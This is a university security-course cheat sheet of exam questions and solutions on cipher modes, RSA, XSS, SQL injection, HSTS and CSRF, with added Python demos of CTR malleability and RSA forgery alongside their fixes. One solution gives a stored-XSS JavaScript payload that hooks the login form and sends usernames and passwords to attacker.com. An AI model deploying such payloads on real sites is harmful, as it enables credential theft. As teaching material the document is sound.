388CheatSheet
School: University of Michigan
Course: 388
Subject: Information Systems
Date: Dec 6, 2023
Pages: 2

Short Answer

(a) [3 points] What is the difference between hashing and encryption? Give an example algorithm of each (specifying its type) and a situation in which you would use each.

Solution: Hashing is a one-way operation, while encryption is intended to be reversed with (and only with) the requisite key. Hash functions (e.g., MD-5, SHA-1, SHA-256, etc.) are used, for example, in the process of assuring message integrity, where they are used to construct HMACs. Encryption algorithms (e.g., AES, RSA, etc.) are used to convey messages confidentially.

RSA like OAEP
ENCRYPT THEN MAC

Cipher Block Chaining (CBC)
To fix, let's make each block rely on the previous:
[Figure: CBC encryption: plaintext blocks and initialization vector (IV)]

[3 points] At a high level, describe how SQL injection and XSS attacks work. Then, state one key similarity and one key difference between the two attacks.

Solution: SQL injection occurs when a server interprets untrusted input as part of a SQL statement, typically due to forming a SQL expression by string concatenation without proper escaping. XSS occurs when a server allows untrusted input to be executed as JavaScript in a browser, again due to inadequate escaping or filtering. The key similarity is that untrusted data is inadvertently executed as code. SQL injection attacks typically take place server-side, while XSS attacks can be reflected (client-side) or stored (server-side) but always execute code client-side.

[Figure: Cipher Block Chaining (CBC) mode encryption: plaintext, block cipher encryption with key, ciphertext]
[Figure: Electronic Codebook (ECB)]
Problem still?

[3 points] Suppose the message uses CTR mode, and consider a MiTM attacker who can guess the destination account number. How can they subvert the protocol to steal money? At a high level, how should we change Shushmail to fix this?

Solution: CTR mode encryption is malleable. An attacker who knows the message format and the original account number a can change the message to account number b by XORing a ⊕ b with that portion of the ciphertext. To fix this, the protocol should add integrity protection by MACing the ciphertext.
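
The malleability and the fix described in this solution, as an added Python example that is not part of the original cheat sheet. The message format and account numbers are constructed, and an HMAC-SHA-256 keystream is assumed as a stand-in for a block cipher in CTR mode so the code needs only the standard library.

```python
import hashlib
import hmac
import os

def keystream(key, nonce, length):
    # Stand-in for a block cipher in CTR mode: block i = PRF(key, nonce || i).
    out = b""
    for counter in range((length + 31) // 32):
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
    return out[:length]

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def ctr_crypt(key, nonce, data):  # the same XOR encrypts and decrypts
    return xor(data, keystream(key, nonce, len(data)))

def seal(enc_key, mac_key, plaintext):
    # Encrypt-then-MAC: the tag covers the nonce and the ciphertext.
    nonce = os.urandom(12)
    ct = ctr_crypt(enc_key, nonce, plaintext)
    return nonce, ct, hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()

def open_sealed(enc_key, mac_key, nonce, ct, tag):
    # Verify the tag before decrypting; return None on any mismatch.
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return ctr_crypt(enc_key, nonce, ct)

def xor_into(ct, offset, a, b):
    # The in-transit change from the solution: XOR (a XOR b) into that portion.
    delta = xor(a, b)
    return ct[:offset] + xor(ct[offset:offset + len(delta)], delta) + ct[offset + len(delta):]

def demo():
    enc_key, mac_key = os.urandom(32), os.urandom(32)
    msg = b"TRANSFER to=11112222 amount=5000"   # constructed sample message
    a, b = b"11112222", b"99998888"             # constructed account numbers
    nonce, ct, tag = seal(enc_key, mac_key, msg)
    tampered = xor_into(ct, msg.index(a), a, b)
    return {
        "ctr_only": ctr_crypt(enc_key, nonce, tampered),                  # decrypts cleanly
        "with_mac": open_sealed(enc_key, mac_key, nonce, tampered, tag),  # rejected
        "untouched": open_sealed(enc_key, mac_key, nonce, ct, tag),
    }

if __name__ == "__main__":
    print(demo())
```

Without the tag check the modified ciphertext decrypts to a well-formed message naming account b; with the tag check it is rejected before decryption.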

[Figure: Electronic Codebook (ECB) mode encryption: plaintext, block cipher encryption with key, ciphertext]

The bank decides to add another layer of protections by requiring customers to confirm transactions by logging into its website using RSA signatures. They use textbook RSA (with no hashing or padding). In order to log in, the customer simply needs to submit any message that is accompanied by a valid signature made with their private key.

(d) [2 points] You’ve managed to find the bank’s CEO’s public key (e, N) on the company website. How could you use this information to log in as the CEO?

Solution: For a random s, compute m = s^e mod N and submit m and s to the server. By construction, s is a valid signature for m. Alternatively, send m = 1 and s = 1 or m = 0 and s = 0. In both cases, s^e = m for all e.
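
Why the textbook verification above accepts these pairs, and how binding the signature to a hash of the message rejects them, as an added Python example that is not part of the original cheat sheet. The toy key (two Mersenne primes), the function names and the login message are constructed for illustration, and plain hash-then-sign is a simplification of a padded scheme such as RSA-PSS.

```python
import hashlib

# Toy key from two known Mersenne primes (constructed; far too small for real use).
P, Q = 2**61 - 1, 2**89 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent (Python 3.8+)

def verify_textbook(m, s):
    # Textbook RSA: accept any pair with s^e mod N == m.
    return pow(s, E, N) == m % N

def digest_int(message):
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % N

def sign_hashed(message):
    return pow(digest_int(message), D, N)

def verify_hashed(message, s):
    # s^e mod N must equal the hash of the message, so choosing s first
    # no longer yields a message that verifies.
    return pow(s, E, N) == digest_int(message)

def pair_from_public_key(s):
    # The public-key-only computation from the solution: m = s^e mod N.
    return pow(s, E, N), s

def demo():
    m, s = pair_from_public_key(123456789)
    m_bytes = m.to_bytes((N.bit_length() + 7) // 8, "big")
    return {
        "textbook_random_s": verify_textbook(m, s),
        "textbook_trivial": verify_textbook(1, 1) and verify_textbook(0, 0),
        "hashed_random_s": verify_hashed(m_bytes, s),
        "hashed_trivial": verify_hashed(b"\x01", 1),
        "hashed_genuine": verify_hashed(b"login:ceo", sign_hashed(b"login:ceo")),
    }

if __name__ == "__main__":
    print(demo())
```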

(f) [2 points] Propose a stronger scheme based on HMAC, and briefly argue why it is better.

Solution: In place of SHA-256, use HMAC-SHA-256 with a randomly chosen key k. Either plan to keep k well protected or discard it before releasing the data.

(b) [1 point] What property of the IP protocol does the Great Cannon exploit to make the client believe that its response packets originated from Baidu?

Solution: IP sources are not authenticated, so the GC can simply put Baidu’s IP address in the src_addr field in order to make it appear that its packets are coming from Baidu.

[1 point] What property of the TCP protocol does the Great Cannon exploit to allow it to inject traffic into the HTTP connection?

Solution: TCP does not include cryptographic integrity or confidentiality protection, exposing data to reading and manipulation by an on-path attacker like the GC.

(d) [2 points] To prevent its users from becoming part of a GC-style attack, Baidu could enable HTTPS for all resources. Name and describe two additional steps it would need to take to ensure that all connections, including those from first-time users, were protected.

Solution:
1. Send an HSTS header to prevent SSL stripping attacks.
2. Add its domain to the HSTS-preload list to protect first-time users.

Padding Oracle Attack
[Figure: Cipher Block Chaining (CBC) mode decryption: ciphertext, block cipher decryption with key, initialization vector (IV), plaintext]

Counter (CTR)
Effectively a stream cipher!
[Figure: Counter (CTR) mode encryption: nonce and counter, block cipher encryption, plaintext, ciphertext]

[5 points] It’s a busy work day, and people (including the admin account) will be logging into the system. Playing the role of an attacker, how can you discover admin’s password, which consists of 64 randomly chosen alphanumeric characters? You have the following resources at your disposal:

* A server you control, located at https://attacker.com/, that can be used to receive and log HTTP requests.
* A web browser with the ability to make requests to SuperDuperSecureLogin but no credentials. You can perform any supported actions that do not require authentication.

Hint: It’s fine if your solution obtains the username and password of any user who logs in to the site form, since you can always filter out every user but admin later.

In the box below, explain each step in your attack. If any involves code, provide
You don’t have to worry about the exact syntax or about the details of any escaping. You should avoid interfering with normal use of the server, but it’s
attack has minor user-visible side effects.

Refresher: How do we Share a Key using DH?
[Figure: Diffie-Hellman key exchange. knowledge: g, p. Secret: a and Secret: b. Exchanged values: g^a mod p, g^b mod p. Computed values: (g^b mod p)^a, (g^a mod p)^b]

Solution:
1. Construct a JavaScript payload like this:

    f = function(){ // override f
      var u = document.querySelector('#username').value;
      var p = document.querySelector('#password').value;
      document.createElement('img').src = 'https://attacker.com?u=' + u + '&p=' + p;
      // ... wait for img to load...
      postAuth(u, p);
    };

2. Wrap the payload in <script>...</script> and encode it as the username parameter in a POST request to /create/.
3. Watch the attacker.com logs and wait for admin to log in. The password will be sent in the p= parameter.

Some alternatives for how to hook the login button:
* Overwriting the onSubmit handler on the login form with a custom handler that sends the values of the username and password to the server.
* Overwriting the definition of f or postAuth with a new definition that sends the username and password to the server.

[Figure: Diffie-Hellman exchange with Secret: a, Secret: b and Secret: z]
[Figure: Diffie-Hellman exchange with RSA signatures. Public: (e, N), Private: d]
2. Once she knows she's talking to Bob, she computes (g^b mod p)^a
* Bob follows the same steps to verify Alice’s signature

RSA Key Exchange
Public: (e, N), Private: d
Public: (e', N'), Private: d'
Alice generates key K
C = K^e' mod N'
S = C^d mod N
She sends both the ciphertext and the signature
Bob verifies: C == S^e mod N
Bob computes K: K = C^d' mod N'

How does the application structure data?
[Figure: Attacker, Victim, Bank. The victim posts a login to the bank, a session is established and a SessionID cookie is set. A page containing a form named badform with hidden from, to, amount and date fields is submitted by script to the bank's transfer endpoint with the valid SessionID. Caption: Transfers funds to attacker]